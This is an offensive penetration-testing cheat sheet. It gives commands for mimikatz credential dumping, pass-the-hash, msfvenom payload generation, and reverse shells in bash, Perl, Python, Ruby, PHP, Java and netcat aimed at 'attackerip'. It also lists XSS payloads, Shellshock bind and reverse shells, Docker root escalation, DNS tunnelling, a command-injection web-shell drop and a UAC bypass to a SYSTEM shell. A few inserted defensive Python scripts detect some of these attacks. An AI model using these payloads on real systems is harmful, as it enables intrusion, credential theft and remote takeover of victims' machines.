    git clone https://github.com/gentilkiwi/mimikatz.git
    privilege::debug
    sekurlsa::logonPasswords full
    Get hashes

    git clone https://github.com/byt3bl33d3r/pth-toolkit
    pth-winexe -U hash //IP cmd

    or

    apt-get install freerdp-x11
    xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP

    or

    meterpreter > run post/windows/gather/hashdump
    Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
    msf > use exploit/windows/smb/psexec
    msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
    msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
    msf exploit(psexec) > exploit
    meterpreter > shell
    Cracking passwords with Hashcat

    hashcat -m 400 -a 0 hash /root/rockyou.txt
    Grabbing banners with NC

    nc 192.168.0.10 80
    GET / HTTP/1.1
    Host: 192.168.0.10
    User-Agent: Mozilla/4.0
    Referrer: www.example.com
    <enter>
    <enter>
    Reverse shell on Windows with NC

    c:>nc -Lp 31337 -vv -e cmd.exe
    nc 192.168.0.10 31337
    c:>nc example.com 80 -e cmd.exe
    nc -lp 80

    nc -lp 31337 -e /bin/bash
    nc 192.168.0.10 31337
    nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000
    Finding SUID/SGID root files

    # Find SUID root files
    find / -user root -perm -4000 -print

    # Find SGID root files:
    find / -group root -perm -2000 -print

    # Find SUID and SGID files:
    find / -perm -4000 -o -perm -2000 -print

    # Find files not owned by any user:
    find / -nouser -print

    # Find files not owned by any group:
    find / -nogroup -print

    # Find symbolic links and their targets:
    find / -type l -ls
    Python shell

    python -c 'import pty;pty.spawn("/bin/bash")'
    Python/Ruby/PHP HTTP servers

    python2 -m SimpleHTTPServer
    python3 -m http.server
    ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
    php -S 0.0.0.0:8888
    Find the PID of the process using a port

    fuser -nv tcp 80
    fuser -k -n tcp 80
    Brute forcing RDP with Hydra

    hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp
    Mounting a remote Windows share

    smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
    Compiling exploits on Kali

    gcc -m32 -o output32 hello.c (32-bit)
    gcc -m64 -o output hello.c (64-bit)
    Compiling Windows exploits on Kali

    wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
    wine mingw-get-setup.exe
    select mingw32-base
    cd /root/.wine/drive_c/windows
    wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
    cd /root/.wine/drive_c/MinGW/bin
    wine gcc -o ability.exe /tmp/exploit.c -lwsock32
    wine ability.exe
    NASM commands

    Note: NASM (The Netwide Assembler) is an assembler for the 80x86 and x86-64 platforms, designed from the start to be portable and modular.

    nasm -f bin -o payload.bin payload.asm
    nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload
    SSH pivoting

    ssh -D 127.0.0.1:1080 -p 22 user@IP
    Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
    proxychains commands target
    SSH pivoting from one network to another

    ssh -D 127.0.0.1:1080 -p 22 user1@IP1
    Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
    proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
    Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
    proxychains commands target
    Pivoting with Metasploit

    route add X.X.X.X 255.255.255.0 1
    use auxiliary/server/socks4a
    run
    proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E

    or

    # https://www.offensive-security.com/metasploit-unleashed/pivoting/
    meterpreter > ipconfig
    IP Address : 10.1.13.3
    meterpreter > run autoroute -s 10.1.13.0/24
    meterpreter > run autoroute -p
    10.1.13.0 255.255.255.0 Session 1
    meterpreter > Ctrl+Z
    msf auxiliary(tcp) > use exploit/windows/smb/psexec
    msf exploit(psexec) > set RHOST 10.1.13.2
    msf exploit(psexec) > exploit
    meterpreter > ipconfig
    IP Address : 10.1.13.2
    Querying Exploit-DB via its CSV file

    git clone https://github.com/offensive-security/exploit-database.git
    cd exploit-database
    ./searchsploit -u
    ./searchsploit apache 2.2
    ./searchsploit "Linux Kernel"

    cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3
    MSF Payloads

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe
    msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c
    Generating a Linux reverse Meterpreter shell with MSF

    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell
    Generating a reverse shell with MSF (C shellcode)

    msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c
    Generating a reverse Python shell with MSF

    msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
    Generating a reverse ASP shell with MSF

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp
    Generating a reverse Bash shell with MSF

    msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh
    Generating a reverse PHP shell with MSF

    msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php
    add <?php at the beginning
    perl -i~ -0777pe's/^/<?php \n/' shell.php
    Generating a reverse Windows shell with MSF

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe
    Common Linux security commands

    # Find setuid programs owned by uid 0
    find / -uid 0 -perm -4000

    # Find world-writable locations
    find / -perm -o=w

    # Find files whose names contain dots and spaces
    find / -name " " -print
    find / -name ".." -print
    find / -name ". " -print
    find / -name " " -print

    # Find files not owned by any user
    find / -nouser

    # Find open files that have been unlinked
    lsof +L1

    # Get information on ports opened by processes
    lsof -i

    # Check the ARP table for anything odd
    arp -a

    # List all accounts
    getent passwd

    # List all groups
    getent group

    # List the crontabs of all users
    for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done

    # Generate random passwords
    cat /dev/urandom| tr -dc 'a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?='|fold -w 12| head -n 4

    # Find all immutable files
    find . | xargs -I file lsattr -a file 2>/dev/null | grep '^....i'

    # Clear the immutable flag on a file (chattr +i sets it)
    chattr -i file
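The `find / -perm -4000`, `-perm -2000` and `-perm -o=w` one-liners above (and the SUID/SGID section earlier) answer "what is set right now"; what a defender usually wants on a second run is "what changed since the baseline". The Python script below is an added example, not from the original cheat sheet: it scans a tree for setuid, setgid and world-writable regular files without following symlinks, diffs the result against a baseline dict, and builds a constructed temporary tree in `demo()` so it runs without root. The baseline contents and file names are made up for the demo.

```python
"""Audit a tree for setuid/setgid/world-writable files and diff against a baseline.

Added example (not from the original cheat sheet). classify_mode() works on
st_mode values so the logic is testable without root; scan() walks a real
tree; demo() builds a constructed tree and baseline.
"""
import os
import stat
import tempfile


def classify_mode(mode):
    """Return the set of flags of interest for a stat st_mode value (regular files only)."""
    flags = set()
    if not stat.S_ISREG(mode):
        return flags
    if mode & stat.S_ISUID:
        flags.add("suid")
    if mode & stat.S_ISGID:
        flags.add("sgid")
    if mode & stat.S_IWOTH:
        flags.add("world-writable")
    return flags


def scan(root):
    """Walk `root` without following symlinks; return {path: flags} for flagged files."""
    findings = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: a symlink to a suid binary is not itself suid
            except OSError:
                continue
            flags = classify_mode(st.st_mode)
            if flags:
                findings[path] = flags
    return findings


def diff_against_baseline(findings, baseline):
    """Report files that are new, changed or gone relative to baseline ({path: flags})."""
    new = {p: f for p, f in findings.items() if p not in baseline}
    changed = {p: f for p, f in findings.items() if p in baseline and baseline[p] != f}
    removed = {p: f for p, f in baseline.items() if p not in findings}
    return {"new": new, "changed": changed, "removed": removed}


def demo():
    """Build a constructed tree, scan it and diff it against a constructed baseline.

    Returns a summary keyed by file name so the result is stable across runs.
    """
    root = tempfile.mkdtemp(prefix="perm-audit-")
    sample = [("passwd", 0o4755), ("wall", 0o2755), ("notes.txt", 0o666), ("plain", 0o755)]
    for name, mode in sample:
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)
    # A symlink to the setuid file must not be reported as setuid itself.
    os.symlink(os.path.join(root, "passwd"), os.path.join(root, "passwd-link"))

    findings = scan(root)
    baseline = {os.path.join(root, "passwd"): {"suid"}}  # constructed: only passwd was expected
    report = diff_against_baseline(findings, baseline)
    return {
        "findings": {os.path.basename(p): sorted(f) for p, f in findings.items()},
        "new": sorted(os.path.basename(p) for p in report["new"]),
        "changed": sorted(os.path.basename(p) for p in report["changed"]),
        "removed": sorted(os.path.basename(p) for p in report["removed"]),
    }


if __name__ == "__main__":
    print(demo())
```

On a real host, run `scan("/")` once after provisioning, store the result, and alert on anything that shows up under `new` or `changed` on later runs; a setuid copy of `/bin/sh` dropped by the Docker trick later in this page would land in `new`.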
    Windows buffer overflow exploitation commands

    msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -b "\x00" -f c

    COMMONLY USED BAD CHARACTERS:
    \x00\x0a\x0d\x20 For http request
    \x00\x0a\x0d\x20\x1a\x2c\x2e\x3a\x5c Ending with (0\n\r_)

    # Common commands:
    pattern create
    pattern offset (EIP Address)
    pattern offset (ESP Address)
    add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )

    !pvefindaddr pattern_create 5000
    !pvefindaddr suggest
    !pvefindaddr modules
    !pvefindaddr nosafeseh

    !mona config -set workingfolder C:\Mona\%p
    !mona config -get workingfolder
    !mona mod
    !mona bytearray -b "\x00\x0a"
    !mona pc 5000
    !mona po EIP
    !mona suggest
    SEH: Structured Exception Handling

    Note: SEH (Structured Exception Handling) is the mechanism the Windows operating system provides to programmers for handling program errors and exceptions.

    # https://en.wikipedia.org/wiki/Microsoft-specific_exception_handling_mechanisms#SEH
    # http://baike.baidu.com/view/243131.htm
    !mona suggest
    !mona nosafeseh
    nseh="\xeb\x06\x90\x90" (next seh chain)
    iseh= !pvefindaddr p1 -n -o -i (POP POP RETURN or POPr32,POPr32,RETN)
    ROP (DEP)

    Note: ROP (Return-Oriented Programming) is an exploitation technique that lets an attacker execute code in the presence of defences such as non-executable memory and code signing.

    DEP (Data Execution Prevention) is a set of hardware and software techniques that strictly separate code from data in memory so that data cannot be executed as code.

    # https://en.wikipedia.org/wiki/Return-oriented_programming
    # https://zh.wikipedia.org/wiki/%E8%BF%94%E5%9B%9E%E5%AF%BC%E5%90%91%E7%BC%96%E7%A8%8B
    # https://en.wikipedia.org/wiki/Data_Execution_Prevention
    # http://baike.baidu.com/item/DEP/7694630
    !mona modules
    !mona ropfunc -m *.dll -cpb "\x00\x09\x0a"
    !mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest)
    ASLR: Address Space Layout Randomization

    # https://en.wikipedia.org/wiki/Address_space_layout_randomization
    # http://baike.baidu.com/view/3862310.htm
    !mona noaslr
    Egg hunting

    Egg hunting is a technique that can be classed as "staged shellcode": a small, specially crafted piece of shellcode locates the real (larger) shellcode, our "egg", by searching memory for it. In other words, a short piece of code runs first, then finds and executes the real shellcode. Adapted from the Pediy (看雪) forum; see the links in the comments below for details.

    # https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
    # http://www.pediy.com/kssd/pediy12/116190/831793/45248.pdf
    # http://www.fuzzysecurity.com/tutorials/expDev/4.html
    !mona jmp -r esp
    !mona egg -t lxxl
    \xeb\xc4 (jump backward -60)
    buff=lxxllxxl+shell
    !mona egg -t 'w00t'
    Common GDB debugger commands

    # Set a breakpoint
    break *_start

    # Execute the next instruction
    next
    step
    n
    s

    # Continue execution
    continue
    c

    # Data
    checking 'REGISTERS' and 'MEMORY'

    # Print a register value (decimal, binary, hex)
    print /d -> Decimal
    print /t -> Binary
    print /x -> Hex
    O/P :
    (gdb) print /d $eax
    $17 = 13
    (gdb) print /t $eax
    $18 = 1101
    (gdb) print /x $eax
    $19 = 0xd
    (gdb)

    # Examine the value at a memory address
    command : x/nyz (Examine)
    n -> Number of fields to display ==>
    y -> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)
    z -> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)
    BASH reverse shell

    bash -i >& /dev/tcp/X.X.X.X/443 0>&1

    exec /bin/bash 0&0 2>&0

    0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

    exec 5<>/dev/tcp/attackerip/4444
    cat <&5 | while read line; do $line 2>&5 >&5; done # or:
    while read line 0<&5; do $line 2>&5 >&5; done

    /bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
    /bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1
    PERL reverse shell

    perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

    # Windows
    perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
    perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    RUBY reverse shell

    ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

    # Windows
    ruby -rsocket -e 'c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
    ruby -rsocket -e 'f=TCPSocket.open("attackerip","443").to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    PYTHON reverse shell

    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    PHP reverse shell

    php -r '$sock=fsockopen("attackerip",443);exec("/bin/sh -i <&3 >&3 2>&3");'
    JAVA reverse shell

    r = Runtime.getRuntime()
    p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
    p.waitFor()
    NETCAT reverse shell

    nc -e /bin/sh attackerip 4444
    nc -e /bin/sh 192.168.37.10 443

    # If the -e option has been disabled, try the following
    # mknod backpipe p && nc attackerip 443 0<backpipe | /bin/bash 1>backpipe
    /bin/sh | nc attackerip 443
    rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/

    # If the installed netcat is the wrong variant, try the following
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f
    TELNET reverse shell

    # If netcat or /dev/tcp is unavailable
    mknod backpipe p && telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe
    XTERM reverse shell

    # http://baike.baidu.com/view/418628.htm
    # Start an X server (:1 listens on TCP port 6001)
    apt-get install xnest
    Xnest :1

    # Remember to authorise connections from the target IP
    xterm -display 127.0.0.1:1

    # Authorise access
    xhost +targetip

    # On the target machine, connect back to our X server
    xterm -display attackerip:1
    /usr/openwin/bin/xterm -display attackerip:1
    or
    $ DISPLAY=attackerip:0 xterm
    XSS cheat sheet

    https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
    ("< iframes > src=http://IP:PORT </ iframes >")

    <script>document.location=http://IP:PORT</script>

    ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

    ";!--"<XSS>=&{()}

    <IMG SRC="javascript:alert('XSS');">
    <IMG SRC=javascript:alert('XSS')>
    <IMG """><SCRIPT>alert("XSS")</SCRIPT>"">
    <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
    <IMG SRC="jav ascript:alert('XSS');">

    perl -e 'print "<IMG SRC=javascript:alert(\"XSS\")>";' > out

    <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

    (">< iframes http://google.com < iframes >)

    <BODY BACKGROUND="javascript:alert('XSS')">
    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
    "><script >alert(document.cookie)</script>
    %253cscript%253ealert(document.cookie)%253c/script%253e
    "><s"%2b"cript>alert(document.cookie)</script>
    %22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
    <img src=asdf onerror=alert(document.cookie)>
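Every payload in the list above only works when user input is written into HTML without context-aware encoding. The Python helpers below are an added example, not part of the original cheat sheet: `encode_html()` is the encoder for HTML text and quoted attribute values (`html.escape`), `safe_url()` allow-lists the scheme of URL-valued attributes so `javascript:` URLs, including the entity-encoded and tab-obfuscated variants above, are rejected, and `render_img()` combines the two. `SAFE_SCHEMES` and the `#` placeholder are choices of this example, not anything the page prescribes.

```python
"""Context-aware output encoding that neutralises the XSS payloads listed above.

Added example (not from the original cheat sheet). Two contexts are covered:
HTML text / quoted attributes, and URL-valued attributes (src, href).
"""
import html
import re
from urllib.parse import urlsplit

# Assumption of this example: only these schemes are allowed in src/href.
SAFE_SCHEMES = {"http", "https"}


def encode_html(value):
    """Encode for HTML text and quoted attribute contexts: & < > " ' become entities."""
    return html.escape(value, quote=True)


def safe_url(value):
    """Return the encoded URL if its scheme is http(s) or it is relative, else '#'.

    Entity-encoded and tab/newline-obfuscated `javascript:` (the &#106;... and
    jav&#x09;ascript: payloads above) are normalised first, the way a browser
    would see them, so the scheme check is made on the effective URL.
    """
    normalised = html.unescape(value)
    normalised = re.sub(r"[\t\n\r]", "", normalised).strip()  # HTML URL parsing drops these
    scheme = urlsplit(normalised).scheme.lower()
    if scheme and scheme not in SAFE_SCHEMES:
        return "#"
    return encode_html(normalised)


def render_img(src, alt):
    """Build an <img> tag with each attribute encoded for its own context."""
    return '<img src="%s" alt="%s">' % (safe_url(src), encode_html(alt))


if __name__ == "__main__":
    print(encode_html('"><script >alert(document.cookie)</script>'))
    print(safe_url("jav\tascript:alert('XSS')"))
    print(render_img("asdf", "x onerror=alert(document.cookie)"))
```

The `onerror=` payload in the last line of the list above is harmless here because `alt` is always emitted inside quotes and its quotes are encoded, so the attacker never leaves the attribute value; the `src` allow-list handles the `javascript:` family separately because encoding alone does not make a dangerous scheme safe.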
    SSH over SCTP (using socat)

    # Remote server
    # Assume you want the SCTP socket to listen on port 80/SCTP and sshd is on 22/TCP
    $ socat SCTP-LISTEN:80,fork TCP:localhost:22

    # Local side
    # Replace SERVER_IP with the remote server's address and 80 with the SCTP listening port
    $ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80

    # Create a SOCKS proxy
    # Replace username and the -p port number
    $ ssh -lusername localhost -D 8080 -p 1337
    Using the Tor network

    # Install the service
    $ apt-get install tor torsocks

    # Expose ssh as a Tor hidden service on port 80
    # /etc/tor/torrc
    SocksPolicy accept 127.0.0.1
    SocksPolicy accept 192.168.0.0/16
    Log notice file /var/log/tor/notices.log
    RunAsDaemon 1
    HiddenServiceDir /var/lib/tor/ssh_hidden_service/
    HiddenServicePort 80 127.0.0.1:22
    PublishServerDescriptor 0
    $ /etc/init.d/tor start
    $ cat /var/lib/tor/ssh_hidden_service/hostname
    3l5zstvt1zk5jhl662.onion

    # ssh client connection
    $ apt-get install torsocks
    $ torsocks ssh login@3l5zstvt1zk5jhl662.onion -p 80
    Metagoofil: metadata collection tool

    Note: Metagoofil is a tool that collects information using Google.

    # http://www.edge-security.com/metagoofil.php
    # It automatically searches for and analyses documents via search engines, and can also extract MAC addresses, user name lists and more
    $ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html
    Exploiting Shellshock

    # A tool to find and exploit Shellshock on servers
    # https://github.com/nccgroup/shocker
    $ ./shocker.py -H 192.168.56.118 --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose

    # Read a file
    $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80

    # Bind shell
    $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80

    # Reverse shell
    $ nc -l -p 443
    $ echo "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.56.103 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80
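All three requests above carry the same marker: a header value that begins with `() {`, the exported-function syntax that vulnerable bash versions evaluated when a CGI server passed the header through the environment. The Python detector below is an added example, not part of the original cheat sheet: it parses raw HTTP requests and reports every header whose value starts with that marker, which is the check a WAF rule or a log-review script would make. The request samples inside are constructed to match the shape of the commands above, not captured traffic.

```python
"""Flag HTTP requests carrying a Shellshock-style function export in a header.

Added example (not from the original cheat sheet). The marker is a header
value starting with "() {" (whitespace may vary); everything after it is the
attacker-chosen command, which is what a web server running bash CGI scripts
would have executed on an unpatched host.
"""
import re

# A header value that begins with "() {" is the Shellshock trigger.
SHELLSHOCK_RE = re.compile(r"^\(\)\s*\{")

# Constructed samples mirroring the probes above; not captured traffic.
CONSTRUCTED_REQUESTS = [
    # Marker in User-Agent, as in the probes above.
    "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo vulnerable\r\nHost: vulnerable\r\nConnection: close\r\n\r\n",
    # Same marker in a different header: the check must look at every header.
    "GET /cgi-bin/status HTTP/1.1\r\nHost: vulnerable\r\nReferer: () { :; }; /usr/bin/id\r\n\r\n",
    # Benign: parentheses in a User-Agent are not enough on their own.
    "GET / HTTP/1.1\r\nHost: vulnerable\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n",
]


def parse_headers(raw):
    """Return (request_line, [(name, value), ...]) from a raw HTTP request."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if ":" not in line:
            continue  # not a header line (or a folded continuation we do not handle)
        name, value = line.split(":", 1)
        headers.append((name.strip(), value.strip()))
    return lines[0], headers


def shellshock_hits(raw):
    """Return [(header_name, value), ...] for every header whose value starts with the marker."""
    _, headers = parse_headers(raw)
    return [(n, v) for n, v in headers if SHELLSHOCK_RE.match(v)]


def scan_requests(requests):
    """Map each request line to its hits; requests with no hits are omitted."""
    report = {}
    for raw in requests:
        hits = shellshock_hits(raw)
        if hits:
            report[parse_headers(raw)[0]] = hits
    return report


if __name__ == "__main__":
    for request_line, hits in scan_requests(CONSTRUCTED_REQUESTS).items():
        print(request_line, "->", hits)
```

Checking every header rather than only User-Agent matters because, as the constructed second request shows, any header that the CGI layer exports (Referer, Cookie, custom headers) carries the same trigger; the real fix is a patched bash, with a rule like this one as a detection layer in front of hosts that have not yet been updated.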
    Getting root via Docker

    # Getting root via Docker
    # The user must be in the docker group
    ek@victum:~/docker-test$ id
    uid=1001(ek) gid=1001(ek) groups=1001(ek),114(docker)

    ek@victum:~$ mkdir docker-test
    ek@victum:~$ cd docker-test

    ek@victum:~$ cat > Dockerfile
    FROM debian:wheezy

    ENV WORKDIR /stuff

    RUN mkdir -p $WORKDIR

    VOLUME [ $WORKDIR ]

    WORKDIR $WORKDIR
    << EOF

    ek@victum:~$ docker build -t my-docker-image .
    ek@victum:~$ docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c \
    'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh'
    ./sh
    whoami
    # root

    ek@victum:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c 'cat /stuff/shadow'
    Bypassing firewalls with a DNS tunnel

    # Tunnel data and commands over DNS to evade firewall inspection
    # dnscat2 supports upload and download commands on the target host to transfer files, data and programs

    # Server (attacker)
    $ apt-get update
    $ apt-get -y install ruby-dev git make g++
    $ gem install bundler
    $ git clone https://github.com/iagox86/dnscat2.git
    $ cd dnscat2/server
    $ bundle install
    $ ruby ./dnscat2.rb
    dnscat2> New session established: 16059
    dnscat2> session -i 16059

    # Client (target)
    # https://downloads.skullsecurity.org/dnscat2/
    # https://github.com/lukebaggett/dnscat2-powershell
    $ dnscat --host <dnscat server_ip>
    Assembling code

    $ nasm -f elf32 simple32.asm -o simple32.o
    $ ld -m elf_i386 simple32.o -o simple32

    $ nasm -f elf64 simple.asm -o simple.o
    $ ld simple.o -o simple
    Reaching an internal network with a non-interactive shell

    # Generate an ssh key pair for the shell to use
    $ wget -O - -q "http://domain.tk/sh.php?cmd=whoami"
    $ wget -O - -q "http://domain.tk/sh.php?cmd=ssh-keygen -f /tmp/id_rsa -N \"\" "
    $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa"

    # Add the user tempuser
    $ useradd -m tempuser
    $ mkdir /home/tempuser/.ssh && chmod 700 /home/tempuser/.ssh
    $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa" > /home/tempuser/.ssh/authorized_keys
    $ chmod 700 /home/tempuser/.ssh/authorized_keys
    $ chown -R tempuser:tempuser /home/tempuser/.ssh

    # Reverse ssh shell
    $ wget -O - -q "http://domain.tk/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f tempuser@<attacker_ip>"
    Getting a shell via POST remote command execution

    attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Bwhoami&submit=submit' 'http://victum.tk/command.php'

    attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit' 'http://victum.tk/command.php'

    attacker:~$ curl http://victum.tk/shell.php?cmd=id

    # Download the shell (phpshell.php) onto the server

    http://victum.tk/shell.php?cmd=php%20-r%20%27file_put_contents%28%22phpshell.php%22,%20fopen%28%22http://attacker.tk/phpshell.txt%22,%20%27r%27%29%29;%27

    # Run nc and execute phpshell.php
    attacker:~$ nc -nvlp 1337
    Getting a SYSTEM-level reverse shell on Win7 as an administrator

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.102 -f exe > danger.exe

    # Show the account configuration
    net user <login>

    # Download psexec on Kali

    https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

    # Upload psexec.exe to the target with a powershell script
    echo $client = New-Object System.Net.WebClient > script.ps1
    echo $targetlocation = "http://192.168.56.102/PsExec.exe" >> script.ps1
    echo $client.DownloadFile($targetlocation,"psexec.exe") >> script.ps1
    powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1

    # Upload danger.exe to the target with a powershell script
    echo $client = New-Object System.Net.WebClient > script2.ps1
    echo $targetlocation = "http://192.168.56.102/danger.exe" >> script2.ps1
    echo $client.DownloadFile($targetlocation,"danger.exe") >> script2.ps1
    powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1

    # Bypass UAC with a precompiled binary:

    https://github.com/hfiref0x/UACME

    # Upload https://github.com/hfiref0x/UACME/blob/master/Compiled/Akagi64.exe to the target with a powershell script
    echo $client = New-Object System.Net.WebClient > script3.ps1
    echo $targetlocation = "http://192.168.56.102/Akagi64.exe" >> script3.ps1
    echo $client.DownloadFile($targetlocation,"Akagi64.exe") >> script3.ps1
    powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script3.ps1

    # Start a listener on Kali
    nc -lvp 4444

    # Run danger.exe with system privileges via Akagi64
    Akagi64.exe 1 C:\Users\User\Desktop\danger.exe

    # Start a listener on Kali
    nc -lvp 4444

    # The next step returns a privileged shell to us
    # Run danger.exe with system privileges via PsExec
    psexec.exe -i -d -accepteula -s danger.exe
